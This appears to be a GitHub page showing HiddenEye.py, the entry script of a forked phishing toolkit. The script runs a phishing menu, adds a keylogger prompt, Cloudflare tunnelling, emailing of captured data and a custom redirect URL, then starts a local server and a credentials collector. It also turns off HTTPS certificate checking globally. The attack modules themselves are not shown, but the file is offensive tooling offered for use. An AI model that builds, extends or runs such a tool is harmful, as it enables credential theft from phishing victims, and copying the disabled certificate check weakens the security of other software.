forked from hanshaze/fish
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathHiddenEye.py
executable file
·56 lines (47 loc) · 2 KB
/
HiddenEye.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#
# HiddenEye Copyright (C) 2020 DarkSec https://dark-sec-official.com
# This program comes with ABSOLUTELY NO WARRANTY; for details read LICENSE.
# This is free software, and you are welcome to redistribute it
# under certain conditions; you can read LICENSE for details.
#
from os import system, environ
import Defs.ActionManager.main_runner as main_runner
import Defs.FeatureManager.keylogger as keylogger
import Defs.FeatureManager.cloudflare as cloudflare
import Defs.FeatureManager.EmailManager.email_prompt as email_prompt
import Defs.ActionManager.Server.server_runner as server_runner
import Defs.ActionManager.simple_informant as simple_informant
import multiprocessing
import sys
import ssl
simple_informant.license_handler()
agreement = simple_informant.terms_of_service_message()
if not agreement:
exit()
if not environ.get('PYTHONHTTPSVERIFY', "") and getattr(ssl, '_create_unverified_context', None):
ssl._create_default_https_context = ssl._create_unverified_context
simple_informant.check_permissions()
simple_informant.verify_connection()
# verCheck() # For now it's useless, i'll rewrite it later, after release.
simple_informant.check_php()
#checkLocalxpose()
#checkOpenport()
#checkPagekite()
#checkLT()
if __name__ == "__main__":
try:
main_runner.start_main_menu()
keylogger.add_keylogger_prompt()
cloudflare.add_cloudflare_prompt()
email_prompt.captured_data_email_prompt()
main_runner.enter_custom_redirecting_url()
port = simple_informant.port_selector()
##############
server_runner.start_server(port)
server_runner.server_selection(port)
multiprocessing.Process(target=server_runner.start_server, args=(port,)).start()
simple_informant.credentials_collector(port)
except KeyboardInterrupt:
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
simple_informant.exit_message(port)
exit()